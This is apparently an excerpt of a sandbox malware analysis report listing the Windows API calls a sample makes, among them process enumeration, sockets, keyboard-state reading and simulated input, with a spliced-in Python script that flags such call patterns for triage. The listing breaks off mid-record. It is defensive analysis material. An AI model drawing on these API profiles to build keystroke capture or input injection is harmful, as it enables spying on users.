                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 006AB10C
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 006AB11A
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 006AB1FC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006AB20B
                                                                    • Part of subcall function 0063E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00664D73,?), ref: 0063E395
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                  • String ID:
                                                                  • API String ID: 1991900642-0
                                                                  • Opcode ID: a140684bb16d7211aed1d817da79c52aeffb9de211580223a39cf7e87f71aba7
                                                                  • Instruction ID: 44438bcc2c24ac7dd78498fd364c3133213d04491e9748994130e762f8ad5cf7
                                                                  • Opcode Fuzzy Hash: a140684bb16d7211aed1d817da79c52aeffb9de211580223a39cf7e87f71aba7
                                                                  • Instruction Fuzzy Hash: 53518BB1508710AFD350EF24D886A6BBBE9FF89754F00892DF58597252EB30E904CF96
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: edf569a9993d500ef3ed1ea62fe59dc587a237cfb74001e4498142a11a84ef1b
                                                                  • Instruction ID: 03281060cb3b981b4a7b3b03b80eaef8bb53e4e147f84544fb00e5be657edc3e
                                                                  • Opcode Fuzzy Hash: edf569a9993d500ef3ed1ea62fe59dc587a237cfb74001e4498142a11a84ef1b
                                                                  • Instruction Fuzzy Hash: FF412B31A00100ABDB61BFBD8C46ABE3AA7EF47330F1C062DF814DF2A1D6358C4156A5
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 006A255A
                                                                  • WSAGetLastError.WSOCK32 ref: 006A2568
                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006A25E7
                                                                  • WSAGetLastError.WSOCK32 ref: 006A25F1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$socket
                                                                  • String ID:
                                                                  • API String ID: 1881357543-0
                                                                  • Opcode ID: 1c50b2874bf6ccef610d00f830fc83cbca7e1d950b62e82764457f3875a96287
                                                                  • Instruction ID: 20ba20bd4f84f207fdef9fec3a5bd89c52ec820d28a9a923cc5e13804c14b96f
                                                                  • Opcode Fuzzy Hash: 1c50b2874bf6ccef610d00f830fc83cbca7e1d950b62e82764457f3875a96287
                                                                  • Instruction Fuzzy Hash: 1541D274A40211AFE720AF24D896F6637E6AB05718F54C45CF9198F3D2D772ED428B90
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 006B6D1A
                                                                  • ScreenToClient.USER32(?,?), ref: 006B6D4D
                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 006B6DBA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: 648495888b6c883abc6186537012d7b7084e892dba3392039d5c87c59723a704
                                                                  • Instruction ID: c6704179d5b9cca7f7418fe21ca677a0f75e808dde098c50e10bf2edad119e35
                                                                  • Opcode Fuzzy Hash: 648495888b6c883abc6186537012d7b7084e892dba3392039d5c87c59723a704
                                                                  • Instruction Fuzzy Hash: 5351E6B5A00209AFCB25DF68D8819EE7BA6EF44360F208559F9159B3A0D774AE81CB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5335eda609e62f61a9dedc757b4dee91756a0807334618150617b698d41a71b
                                                                  • Instruction ID: 95cbf478b53b40edc6a77912d288ee1fe3dbea1f04f3645c422ef6b906cc24e9
                                                                  • Opcode Fuzzy Hash: e5335eda609e62f61a9dedc757b4dee91756a0807334618150617b698d41a71b
                                                                  • Instruction Fuzzy Hash: 6A412B71A00704AFD724AF78CC51BAABBEFEF88711F10952EF511DB291D771A9058784
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006961C8
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 006961EE
                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00696213
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0069623F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 3321077145-0
                                                                  • Opcode ID: b8aaeb87a88bb576c759ad4cee9860c350ad3af11dd15e0db3f3ea38e97f2ac0
                                                                  • Instruction ID: d00dd6c1af16703a925b18c72f1ccceeda07d99511acf6548009341533dfcf64
                                                                  • Opcode Fuzzy Hash: b8aaeb87a88bb576c759ad4cee9860c350ad3af11dd15e0db3f3ea38e97f2ac0
                                                                  • Instruction Fuzzy Hash: 7B411A35600A20DFCB51EF14C545A59BBE7AF89720B198498E84A9B3A2CB31FD41CF95
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0068B473
                                                                  • SetKeyboardState.USER32(00000080), ref: 0068B48F
                                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0068B4FD
                                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0068B54F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 44462a9c92346d7522c5707ded21af50f671abb7b34a4e7ea23c9c12aeed3127
                                                                  • Instruction ID: d8f3e900ecf90bc40e19351050cef8604337e505211b4b685c1f10ba3ba95b10
                                                                  • Opcode Fuzzy Hash: 44462a9c92346d7522c5707ded21af50f671abb7b34a4e7ea23c9c12aeed3127
                                                                  • Instruction Fuzzy Hash: 7B314B70A406086EFF30EF6488067FE7BB7AB48310F04631AE495562D6D77499868766
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0068B5B8
                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 0068B5D4
                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 0068B63B
                                                                  • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0068B68D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 610c48a8cd36c3df3930b975f4a2fb3870296a84c3ad6e45024d4d8de28d7cfa
                                                                  • Instruction ID: 89f01c096c679cf5b77472fd42af07f20e237ea73652a69b1290dd48db00e50f
                                                                  • Opcode Fuzzy Hash: 610c48a8cd36c3df3930b975f4a2fb3870296a84c3ad6e45024d4d8de28d7cfa
                                                                  • Instruction Fuzzy Hash: 13313C70D40608AEFF30AB6488157FE7BA7EF89310F04532AE485562D1E7748AC68BA5
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 006B80D4
                                                                  • GetWindowRect.USER32(?,?), ref: 006B814A
                                                                  • PtInRect.USER32(?,?,?), ref: 006B815A
                                                                  • MessageBeep.USER32(00000000), ref: 006B81C6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: bb5fddd39401e0c76ea72177d5070a9f771d3bd0cf59b5335c82263084e19e3d
                                                                  • Instruction ID: 507949c4570ddde063da6db88c14bc7fd5a681445c454f20ff48e463b834f65b
                                                                  • Opcode Fuzzy Hash: bb5fddd39401e0c76ea72177d5070a9f771d3bd0cf59b5335c82263084e19e3d
                                                                  • Instruction Fuzzy Hash: 65417EB0A02216DFCB15CF5DC895AE9B7FABB45314F1441A8E9549F362CB70A883CF90
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 006B2187
                                                                    • Part of subcall function 00684393: GetWindowThreadProcessId.USER32(?,00000000), ref: 006843AD
                                                                    • Part of subcall function 00684393: GetCurrentThreadId.KERNEL32 ref: 006843B4
                                                                    • Part of subcall function 00684393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00682F00), ref: 006843BB
                                                                  • GetCaretPos.USER32(?), ref: 006B219B
                                                                  • ClientToScreen.USER32(00000000,?), ref: 006B21E8
                                                                  • GetForegroundWindow.USER32 ref: 006B21EE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: 778e0d3ee82fa24a87e99cc47a3e6a456a2834cfa806aa0a3d90f067b81facc9
                                                                  • Instruction ID: fdc5cc5fe2d491eeaca55724c90cf2abd6e75b5a52334dadf996c3e3ae6954c0
                                                                  • Opcode Fuzzy Hash: 778e0d3ee82fa24a87e99cc47a3e6a456a2834cfa806aa0a3d90f067b81facc9
                                                                  • Instruction Fuzzy Hash: 823130B1D01519AFCB44EFA9C881CEEBBF9EF48304B50846AE515E7211DA719E45CFA0
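The two records above, the GetKeyboardState / SetKeyboardState / PostMessageW / SendInput block at 0068B5B8 and the GetForegroundWindow / AttachThreadInput / GetCaretPos block at 006B2187, are the kind of evidence behind the "simulate keystroke presses" and "retrieve information about pressed keystrokes" signatures in the overview. The Python below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses records written in exactly the text shape printed here into structured calls, flags API combinations of interest, and decodes the literal Msg argument passed to PostMessageW (0x0101 is WM_KEYUP). The SAMPLE text is constructed from the lines above with the hash and dump fields dropped; the rule labels, API sets and hit thresholds are my own triage choices, not Joe Sandbox's signature logic.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample in the shape of the report's records (taken from the listing
# above; hash and dump fields that the parser ignores are left out).
SAMPLE = """APIs
• GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0068B5B8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 0068B5D4
• PostMessageW.USER32(00000000,00000101,00000000), ref: 0068B63B
• SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0068B68D
Similarity
• API ID: KeyboardState$InputMessagePostSend
• Opcode ID: 44462a9c92346d7522c5707ded21af50f671abb7b34a4e7ea23c9c12aeed3127
APIs
• GetForegroundWindow.USER32 ref: 006B2187
  • Part of subcall function 00684393: GetWindowThreadProcessId.USER32(?,00000000), ref: 006843AD
  • Part of subcall function 00684393: GetCurrentThreadId.KERNEL32 ref: 006843B4
  • Part of subcall function 00684393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00682F00), ref: 006843BB
• GetCaretPos.USER32(?), ref: 006B219B
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• Opcode ID: 778e0d3ee82fa24a87e99cc47a3e6a456a2834cfa806aa0a3d90f067b81facc9
APIs
• GetFileAttributesW.KERNEL32(?,006BDC30), ref: 0068DBA6
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0068DBC4
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• Opcode ID: 16bae022074c54ad15f5bc18659737c51fe1fd70e10fb9027ad86979a3b6e447
"""

# One call line: optional "Part of subcall function <addr>:" prefix, Name.MODULE,
# optional (args), then "ref: <addr>" (the comma before ref is absent when there are no args).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.([A-Z0-9_]+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]   # raw hex literals, or "?" where the sandbox could not resolve a value
    ref: str                # address of the call site
    subcall: str | None     # callee address when the report nests the call, else None

@dataclass
class FunctionRecord:
    api_id: str = ""
    opcode_id: str = ""
    calls: list[ApiCall] = field(default_factory=list)

def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into per-function records; a '• Opcode ID:' line closes a record."""
    records: list[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            sub, name, module, args, ref = m.groups()
            cur.calls.append(ApiCall(name, module, tuple(args.split(",")) if args else (), ref, sub))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
    return records

# Triage rules (my own, not Joe Sandbox signature logic): label, APIs that count, distinct hits needed.
RULES = [
    ("simulates keystrokes", frozenset({"SendInput", "SetKeyboardState", "keybd_event"}), 1),
    ("reads keyboard state", frozenset({"GetKeyboardState", "GetAsyncKeyState", "GetKeyState"}), 1),
    ("attaches to foreground thread input",
     frozenset({"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"}), 3),
]
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}

def classify(rec: FunctionRecord) -> list[str]:
    names = {c.name for c in rec.calls}
    return [label for label, apis, need in RULES if len(names & apis) >= need]

def posted_key_messages(rec: FunctionRecord) -> list[str]:
    """Decode the Msg argument of Post/SendMessage calls when the report shows a hex literal."""
    out = []
    for c in rec.calls:
        if not c.name.startswith(("PostMessage", "SendMessage")) or len(c.args) < 2:
            continue
        try:
            msg = int(c.args[1], 16)   # "?" (unresolved) raises ValueError and is skipped
        except ValueError:
            continue
        if msg in WINDOW_MESSAGES:
            out.append(WINDOW_MESSAGES[msg])
    return out

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.opcode_id[:16], classify(rec), posted_key_messages(rec))
```

Running it prints one line per record: the first is flagged as both simulating keystrokes and reading keyboard state with a posted WM_KEYUP, the second as attaching to the foreground window's input thread, and the directory-creation record gets no label. The thresholds matter: GetForegroundWindow alone is ubiquitous in GUI code, so that rule only fires when all three thread-input APIs appear in the same function.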
                                                                  APIs
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                  • _wcslen.LIBCMT ref: 0068E8E2
                                                                  • _wcslen.LIBCMT ref: 0068E8F9
                                                                  • _wcslen.LIBCMT ref: 0068E924
                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0068E92F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$ExtentPoint32Text
                                                                  • String ID:
                                                                  • API String ID: 3763101759-0
                                                                  • Opcode ID: 7168dea3642497a40275b9cd9d8b17b5191b4a83d354595930101d799905d02c
                                                                  • Instruction ID: 9ef2ca965ac143ed3c9d377f8da4cb78237a51020e16a0919f3dc5d135c2be69
                                                                  • Opcode Fuzzy Hash: 7168dea3642497a40275b9cd9d8b17b5191b4a83d354595930101d799905d02c
                                                                  • Instruction Fuzzy Hash: C021F7B1D00224EFDB50AFA4D982BEEB7FAEF45310F154169E804BB341DA709E41CBA5
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,006BDC30), ref: 0068DBA6
                                                                  • GetLastError.KERNEL32 ref: 0068DBB5
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0068DBC4
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,006BDC30), ref: 0068DC21
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 2267087916-0
                                                                  • Opcode ID: 16bae022074c54ad15f5bc18659737c51fe1fd70e10fb9027ad86979a3b6e447
                                                                  • Instruction ID: 665804b4c82ee28bfaa76f306ec28a46822d7b275fb0a0689d10e27d332061a0
                                                                  • Opcode Fuzzy Hash: 16bae022074c54ad15f5bc18659737c51fe1fd70e10fb9027ad86979a3b6e447
                                                                  • Instruction Fuzzy Hash: AA21A3701446019F8710EF24D88089BBBEAFE5A364F104B1DF499C72E1E730D946CFA2
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 006B32A6
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006B32C0
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006B32CE
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006B32DC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  • Opcode ID: 19c1b0b39d33f4df5296294b6e87575009725a37f3b74a0d4c6ad6d7a86e5958
                                                                  • Instruction ID: 1db48281c2f6999cd273b6a971bb4e50df917480284c445d0f93e1ffe10fa4ad
                                                                  • Opcode Fuzzy Hash: 19c1b0b39d33f4df5296294b6e87575009725a37f3b74a0d4c6ad6d7a86e5958
                                                                  • Instruction Fuzzy Hash: E121A171704521AFD7549B24C845FEA7B96AF85324F24825CF8268B392CB71EE81CBD0
                                                                  APIs
                                                                    • Part of subcall function 006896E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00688271,?,000000FF,?,006890BB,00000000,?,0000001C,?,?), ref: 006896F3
                                                                    • Part of subcall function 006896E4: lstrcpyW.KERNEL32(00000000,?,?,00688271,?,000000FF,?,006890BB,00000000,?,0000001C,?,?,00000000), ref: 00689719
                                                                    • Part of subcall function 006896E4: lstrcmpiW.KERNEL32(00000000,?,00688271,?,000000FF,?,006890BB,00000000,?,0000001C,?,?), ref: 0068974A
                                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,006890BB,00000000,?,0000001C,?,?,00000000), ref: 0068828A
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,006890BB,00000000,?,0000001C,?,?,00000000), ref: 006882B0
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,006890BB,00000000,?,0000001C,?,?,00000000), ref: 006882EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  • Opcode ID: e433c15d401fe04648fa187998619783fb37f3e1a178d0ca850e8c882d9c2726
                                                                  • Instruction ID: 1bf8ad706d3f4e4fad6a0a2cb4ac4395c3e5500f879f5ff3842f831f25c325a6
